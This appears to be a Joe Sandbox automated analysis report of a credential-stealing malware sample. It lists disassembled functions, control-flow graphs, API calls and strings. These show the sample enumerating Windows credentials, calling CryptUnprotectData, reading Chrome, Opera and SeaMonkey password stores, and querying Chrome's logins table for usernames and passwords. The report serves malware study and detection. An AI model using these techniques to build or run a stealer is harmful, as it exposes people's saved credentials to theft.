                                                                                                                                                    • Opcode ID: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                                                                                                                    • Instruction ID: 01e0680712ac90f889d23e176cd2934d89dbbab4f1fad96818c53916f6f4ffc6
                                                                                                                                                    • Opcode Fuzzy Hash: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                                                                                                                    • Instruction Fuzzy Hash: D6E02230A0062067E3217732BE07FCF22848F02348F00403BFA00DA366F6AC881506ED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410168 Relevance: 56.4, APIs: 23, Strings: 9, Instructions: 441COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 410168-410185 call 442a90 3 4101b1-4101ba 0->3 4 410187-4101ac call 409a34 call 408619 call 409eb8 call 44236d 0->4 6 4101c0-4101fb memset call 40ed6c wcsrchr 3->6 7 41029e-4102a7 3->7 4->3 23 410200-410214 6->23 24 4101fd 6->24 9 410387-410390 7->9 10 4102ad-410306 call 407e96 call 40f0d5 memset call 411bbc 7->10 12 410396-4103f0 memset * 3 9->12 13 4104da-4104e3 9->13 64 410315-410335 ExpandEnvironmentStringsW call 4063c1 10->64 65 410308-410313 call 407548 10->65 17 4103f2-4103fb 12->17 18 410424-410455 call 412270 wcslen * 2 12->18 20 4104e5-410507 memset call 401b06 13->20 21 41052c-410535 13->21 17->18 29 4103fd-41041f call 407447 call 410075 17->29 51 410472 18->51 52 410457-410470 call 4076a9 18->52 42 41050c-410514 20->42 27 4107a3-4107a7 21->27 28 41053b-410541 21->28 25 410220-410223 23->25 26 410216-41021c 23->26 24->23 35 410233-410235 25->35 36 410225-41022e 25->36 26->25 34 41021e 26->34 37 410543-410548 28->37 38 41054d-4105b0 memset * 2 call 412270 wcslen * 2 28->38 29->13 34->25 47 410255-41025e call 407e96 call 40f2e6 35->47 48 410237-41023b 35->48 36->35 44 410230 36->44 45 410664-410671 call 4421eb 37->45 67 4105b2-4105cb call 4076a9 38->67 68 4105cd 38->68 53 410527-41052a 42->53 54 410516-410523 42->54 44->35 45->27 87 410263-410266 47->87 48->47 58 41023d-410253 call 406dd9 48->58 56 410479-4104a9 call 410000 wcslen * 2 51->56 52->56 53->21 54->53 82 4104c6 56->82 83 4104ab-4104c4 call 4076a9 56->83 58->7 84 41033a-41033c 64->84 65->64 88 41034d-410352 65->88 79 4105d4-4105e3 call 407548 67->79 68->79 102 4105e5 79->102 103 4105ec-4105f3 79->103 92 4104cd-4104d5 call 410000 82->92 83->92 90 41034a 84->90 91 41033e-410348 84->91 94 410294-41029c call 407eb8 87->94 95 410268 87->95 99 41037d-410385 call 407eb8 88->99 100 410354 88->100 90->88 91->99 92->13 94->7 96 41026e-410292 call 407fe8 call 406dd9 95->96 96->94 99->9 109 41035a-41037b call 407fe8 call 406dd9 100->109 102->103 105 4105f5-410619 wcslen * 2 103->105 106 41065e 103->106 111 410636 105->111 112 41061b-410634 call 4076a9 105->112 106->45 109->99 117 41063d-41064c call 407548 111->117 112->117 125 410655-41065c 117->125 126 41064e 117->126 125->106 127 410676-4106b6 memset wcslen * 2 125->127 126->125 128 4106d3 127->128 129 4106b8-4106d1 call 4076a9 127->129 131 4106da-410708 call 4083e1 128->131 129->131 135 410785-410792 call 408441 131->135 138 410798-41079e call 4084da 135->138 139 41070a-410717 call 40839d 135->139 138->27 139->135 143 410719-41073d wcslen * 2 139->143 144 41075a 143->144 145 41073f-410758 call 4076a9 143->145 147 410761-410770 call 407548 144->147 145->147 147->135 151 410772-410780 call 4421eb 147->151 151->135
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004101DA
                                                                                                                                                    • wcsrchr.MSVCRT ref: 004101F2
                                                                                                                                                    • memset.MSVCRT ref: 004102D9
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326
                                                                                                                                                      • Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
                                                                                                                                                      • Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11
                                                                                                                                                      • Part of subcall function 00408619: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                                                                                                                      • Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
                                                                                                                                                      • Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                                                                                                                      • Part of subcall function 00408619: memset.MSVCRT ref: 00408725
                                                                                                                                                      • Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746
                                                                                                                                                      • Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                                                                                                                      • Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                                                                                                                      • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
                                                                                                                                                      • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
                                                                                                                                                      • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
                                                                                                                                                      • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
                                                                                                                                                      • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
                                                                                                                                                      • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
                                                                                                                                                      • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
                                                                                                                                                      • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
                                                                                                                                                      • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
                                                                                                                                                      • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
                                                                                                                                                      • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421
                                                                                                                                                    • memset.MSVCRT ref: 004103AA
                                                                                                                                                    • memset.MSVCRT ref: 004103C6
                                                                                                                                                    • memset.MSVCRT ref: 004103E2
                                                                                                                                                    • memset.MSVCRT ref: 004104F9
                                                                                                                                                      • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
                                                                                                                                                      • Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                                                                                                                      • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
                                                                                                                                                      • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
                                                                                                                                                      • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
                                                                                                                                                      • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
                                                                                                                                                      • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
                                                                                                                                                      • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
                                                                                                                                                      • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
                                                                                                                                                      • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07
                                                                                                                                                    • wcslen.MSVCRT ref: 00410437
                                                                                                                                                    • wcslen.MSVCRT ref: 00410446
                                                                                                                                                    • wcslen.MSVCRT ref: 0041048B
                                                                                                                                                    • wcslen.MSVCRT ref: 0041049A
                                                                                                                                                    • memset.MSVCRT ref: 00410562
                                                                                                                                                    • memset.MSVCRT ref: 0041057A
                                                                                                                                                    • wcslen.MSVCRT ref: 00410593
                                                                                                                                                    • wcslen.MSVCRT ref: 004105A1
                                                                                                                                                    • wcslen.MSVCRT ref: 004105FC
                                                                                                                                                    • wcslen.MSVCRT ref: 0041060A
                                                                                                                                                    • memset.MSVCRT ref: 0041068A
                                                                                                                                                    • wcslen.MSVCRT ref: 00410699
                                                                                                                                                    • wcslen.MSVCRT ref: 00410720
                                                                                                                                                    • wcslen.MSVCRT ref: 0041072E
                                                                                                                                                    • wcslen.MSVCRT ref: 004106A7
                                                                                                                                                      • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                                                                      • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                                                                                      • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
                                                                                                                                                      • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
                                                                                                                                                    • String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
                                                                                                                                                    • API String ID: 3717286792-109336846
                                                                                                                                                    • Opcode ID: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                                                                                                                    • Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
                                                                                                                                                    • Opcode Fuzzy Hash: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                                                                                                                    • Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E2F1 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 148COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00403926: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                                                                                                                      • Part of subcall function 00403926: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                                                                                                                      • Part of subcall function 00403926: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                                                                                                                      • Part of subcall function 00403926: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002), ref: 0040E319
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00411F7E,00000000,?,00000002), ref: 0040E332
                                                                                                                                                    • EnumResourceTypesW.KERNEL32 ref: 0040E339
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E4CB
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040E4E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                    • API String ID: 3591293073-28296030
                                                                                                                                                    • Opcode ID: 04717ecad4c52e76b3f79b80568957338dee78a451c8cd20a0ad402c75147398
                                                                                                                                                    • Instruction ID: 121834c48f7c844bba9a1922674ad86b62a86fe916e360ab8a1a69ef7a5829fa
                                                                                                                                                    • Opcode Fuzzy Hash: 04717ecad4c52e76b3f79b80568957338dee78a451c8cd20a0ad402c75147398
                                                                                                                                                    • Instruction Fuzzy Hash: 5451B171408345ABD720AFA2DD4895FB7A8FF84709F000D3EF640A3191DB79D9158B2A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408D9D Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 261 408d9d-408dc0 call 4057c4 call 4059f7 265 408dc5-408dc7 261->265 266 408f92-408fa1 call 40580a 265->266 267 408dcd-408df2 265->267 268 408df6-408e08 call 405cf6 267->268 273 408f68-408f75 call 4059ba 268->273 274 408e0e-408e8d call 408801 * 7 memset call 40805c 268->274 279 408df4 273->279 280 408f7b-408f87 call 408037 273->280 298 408ebb-408ec0 274->298 299 408e8f-408ea0 call 406295 274->299 279->268 280->266 287 408f89-408f91 free 280->287 287->266 300 408ec2-408ec8 298->300 301 408ecb-408ed0 298->301 308 408ea2 299->308 309 408ea5-408eb3 wcschr 299->309 300->301 303 408ed2-408ee3 memcpy 301->303 304 408ee6-408eeb 301->304 303->304 306 408f01-408f06 304->306 307 408eed-408efe memcpy 304->307 311 408f08-408f19 memcpy 306->311 312 408f1c-408f21 306->312 307->306 308->309 309->298 310 408eb5-408eb8 309->310 310->298 311->312 313 408f23-408f34 memcpy 312->313 314 408f37-408f3c 312->314 313->314 315 408f50-408f55 314->315 316 408f3e-408f4d 314->316 315->273 317 408f57-408f5b 315->317 316->315 317->273 318 408f5d-408f65 317->318 318->273
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                                                                                                                      • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                                                                                                                    • free.MSVCRT(00000000), ref: 00408F8C
                                                                                                                                                      • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                                                                                                                    • memset.MSVCRT ref: 00408E72
                                                                                                                                                      • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                                                                                                                      • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                                                                                                                    • wcschr.MSVCRT ref: 00408EAA
                                                                                                                                                    • memcpy.MSVCRT ref: 00408EDE
                                                                                                                                                    • memcpy.MSVCRT ref: 00408EF9
                                                                                                                                                    • memcpy.MSVCRT ref: 00408F14
                                                                                                                                                    • memcpy.MSVCRT ref: 00408F2F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                    • Opcode ID: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
                                                                                                                                                    • Instruction ID: 190f3b00b4426260eb01f26a53b79380eacfea7d83453a492e965ac02b193b52
                                                                                                                                                    • Opcode Fuzzy Hash: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
                                                                                                                                                    • Instruction Fuzzy Hash: 64510C72E00309AAEF10EFA5DD45A9EB7B9AF54314F14403FA544F7281EA78AA048F58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408B10 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408836: memset.MSVCRT ref: 0040885E
                                                                                                                                                      • Part of subcall function 00408836: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                                                                                                                      • Part of subcall function 00408836: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
                                                                                                                                                      • Part of subcall function 00408836: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                                                                                                                      • Part of subcall function 00408836: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                                                                                                                      • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408BB1
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                                                                                                                      • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                                                                                                                      • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                                                                                                                      • Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
                                                                                                                                                      • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                                                                                                                    • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                                                                                                                    • WriteFile.KERNELBASE(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00408C30
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00408C35
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408C3A
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408C3F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWritememset
                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
                                                                                                                                                    • API String ID: 3663438264-4002013007
                                                                                                                                                    • Opcode ID: 92f9f1b067ef90b6ccee0d8b67f312e4d5537bffff8df701e651ec9a81ff62ca
                                                                                                                                                    • Instruction ID: 68c5544b499915da94545e51db83da674be7fd43246ed759ba52d344f26358cd
                                                                                                                                                    • Opcode Fuzzy Hash: 92f9f1b067ef90b6ccee0d8b67f312e4d5537bffff8df701e651ec9a81ff62ca
                                                                                                                                                    • Instruction Fuzzy Hash: CD412775901218BBDF11AF95CD899DFBFB9EF09751F10802AF608A6250DB349A40CFA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402846 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 239fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040286E
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402882
                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028A3
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028AE
                                                                                                                                                    • memset.MSVCRT ref: 004028C7
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000003,00000000,00000000), ref: 00402B1A
                                                                                                                                                      • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                                                                                                                      • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                                                                                                                      • Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
                                                                                                                                                    • memset.MSVCRT ref: 0040293C
                                                                                                                                                      • Part of subcall function 004027D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040280F
                                                                                                                                                      • Part of subcall function 004027D7: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040283C
                                                                                                                                                      • Part of subcall function 00407DF5: MultiByteToWideChar.KERNEL32(00000000,00000000,004029BE,000000FF,?,?,004029BE,?,?,000003FF), ref: 00407E07
                                                                                                                                                      • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                                                                                                                      • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                                                                                                                      • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                                                                                                                    • memset.MSVCRT ref: 00402A95
                                                                                                                                                    • memcpy.MSVCRT ref: 00402AA8
                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,000000FF,?,?,?,00000000,00000000,00000003), ref: 00402AD2
                                                                                                                                                    Strings
                                                                                                                                                    • chp, xrefs: 0040288D
                                                                                                                                                    • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402908
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Timememset$FreeLibraryLocalTemp$AddressByteChangeCharCloseCopyCreateDeleteDirectoryFindLoadMultiNameNotificationPathProcSystemWideWindowsmemcpy
                                                                                                                                                    • String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
                                                                                                                                                    • API String ID: 3603309061-1844170479
                                                                                                                                                    • Opcode ID: d0caedd4ff45bc23c3f78f8d9d05a4faab82fa60d4f04c7d7ee099d959827c57
                                                                                                                                                    • Instruction ID: e637edadd966e00c71b87c8ff6cc297e5f4b8f19ec80fc414d035a4907c068e8
                                                                                                                                                    • Opcode Fuzzy Hash: d0caedd4ff45bc23c3f78f8d9d05a4faab82fa60d4f04c7d7ee099d959827c57
                                                                                                                                                    • Instruction Fuzzy Hash: 37815172D001186BDB11EBA59D46BEEB7BCAF04304F5404BAF509F7281EB786F448B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F0D5 Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 457 40f0d5-40f192 memset * 5 call 412270 * 2 wcslen * 2 462 40f194-40f1ad call 4076a9 457->462 463 40f1af 457->463 465 40f1b6-40f1d9 wcslen * 2 462->465 463->465 467 40f1f6 465->467 468 40f1db-40f1f4 call 4076a9 465->468 470 40f1fd-40f220 wcslen * 2 467->470 468->470 472 40f222-40f23b call 4076a9 470->472 473 40f23d 470->473 474 40f244-40f280 call 40ef37 * 2 call 407e96 call 40f4f7 472->474 473->474 485 40f282 474->485 486 40f2d7-40f2e3 call 407eb8 474->486 488 40f286-40f2c2 memset call 407fe8 call 407447 485->488 494 40f2d1-40f2d5 488->494 495 40f2c4-40f2cc call 407f88 488->495 494->486 497 40f284 494->497 495->494 497->488
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F0F8
                                                                                                                                                    • memset.MSVCRT ref: 0040F10D
                                                                                                                                                    • memset.MSVCRT ref: 0040F122
                                                                                                                                                    • memset.MSVCRT ref: 0040F137
                                                                                                                                                    • memset.MSVCRT ref: 0040F14C
                                                                                                                                                      • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                      • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                                                                                      • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                                                                      • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F172
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F183
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F1BB
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F1C9
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F202
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F210
                                                                                                                                                    • memset.MSVCRT ref: 0040F296
                                                                                                                                                      • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                                                                      • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                    • API String ID: 2775653040-2068335096
                                                                                                                                                    • Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                                                                                    • Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
                                                                                                                                                    • Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                                                                                    • Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F2E6 Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 498 40f2e6-40f3a3 memset * 5 call 412270 * 2 wcslen * 2 503 40f3c0 498->503 504 40f3a5-40f3be call 4076a9 498->504 506 40f3c7-40f3ea wcslen * 2 503->506 504->506 508 40f407 506->508 509 40f3ec-40f405 call 4076a9 506->509 511 40f40e-40f431 wcslen * 2 508->511 509->511 513 40f433-40f44c call 4076a9 511->513 514 40f44e 511->514 516 40f455-40f487 call 40ef37 * 2 call 407e96 call 40f4f7 513->516 514->516 525 40f48c-40f491 516->525 526 40f493 525->526 527 40f4e8-40f4f4 call 407eb8 525->527 529 40f497-40f4d3 memset call 407fe8 call 407447 526->529 535 40f4e2-40f4e6 529->535 536 40f4d5-40f4dd call 407f88 529->536 535->527 538 40f495 535->538 536->535 538->529
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F309
                                                                                                                                                    • memset.MSVCRT ref: 0040F31E
                                                                                                                                                    • memset.MSVCRT ref: 0040F333
                                                                                                                                                    • memset.MSVCRT ref: 0040F348
                                                                                                                                                    • memset.MSVCRT ref: 0040F35D
                                                                                                                                                      • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                      • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                                                                                      • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                                                                      • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F383
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F394
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F3CC
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F3DA
                                                                                                                                                    • wcslen.MSVCRT ref: 0040F413
